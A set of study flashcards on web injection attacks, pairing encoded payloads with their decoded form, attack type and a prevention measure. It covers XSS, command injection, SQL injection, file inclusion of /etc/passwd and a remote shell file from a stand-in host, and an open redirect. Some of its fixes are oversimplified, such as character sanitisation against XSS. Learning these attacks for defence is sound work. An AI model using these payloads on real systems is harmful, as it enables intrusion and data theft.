Injections and how to stop them Flashcards
Example of injection:
Search=Bob"%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e
Human Readable (HTML encoding translated):
Search=Bob"><img src=a onerror=alert(1)>
Type of injection:
Reflected Cross Site Scripting
How to prevent:
Input sanitization of ", ', <, >, ;, -
Example of injection:
#inner-tab">
alert(1)
Human Readable (HTML encoding translated):
#inner-tab">
alert(1)
Type of injection:
DOM-based Cross Site Scripting
How to prevent:
Input sanitization of ", ', <, >, ;, -
Example of injection:
Site=www.exa'ping%20-c%202010%20localhost'mple.com
Human Readable (HTML encoding translated):
Site=www.exa'ping -c 2010 localhost'mple.com
Type of injection:
Command Injection
How to prevent:
Input sanitization of ", ', <, >, ;, -
Example of injection:
Item=widget';waitfor%20delay%20'00:00:20';--
Human Readable (HTML encoding translated):
Item=widget';waitfor delay '00:00:20';--
Type of injection:
SQL Injection (Stacked)
How to prevent:
Parameterized Queries
Example of injection:
Logfile=%2fetc%2fpasswd%00
Human Readable (HTML encoding translated):
Logfile=/etc/passwd (followed by a null byte, %00)
Type of injection:
Local File Inclusion
How to prevent:
Input sanitization of .. and ./; sandbox requests
Example of injection:
Logfile=http:%2f%2fwww.malicious-site.com%2fshell.txt
Human Readable (HTML encoding translated):
Logfile=http://www.malicious-site.com/shell.txt
Type of injection:
Remote File Inclusion
How to prevent:
Input sanitization of .. and ./; sandbox requests
Example of injection:
Item=widget%20union%20select%20null,null,@@version;--
Human Readable (HTML encoding translated):
Item=widget union select null,null,@@version;--
Type of injection:
SQL Injection (Union Based)
How to prevent:
Parameterized Queries
Example of injection:
Redir=http:%2f%2fwww.malicious-site.com
Human Readable (HTML encoding translated):
Redir=http://www.malicious-site.com
Type of injection:
URL Redirect
How to prevent:
Preventing External Calls
Example of injection:
Item=widget'+convert(int,@@version)+'
Human Readable (HTML encoding translated):
Item=widget'+convert(int,@@version)+'
Type of injection:
SQL Injection (Error Based)
How to prevent:
Parameterized Queries
Example of injection:
Lookup=$(whoami)
Human Readable (HTML encoding translated):
Lookup=$(whoami)
Type of injection:
Command Injection
How to prevent:
Input sanitization of ', ;, $, {, }, (, )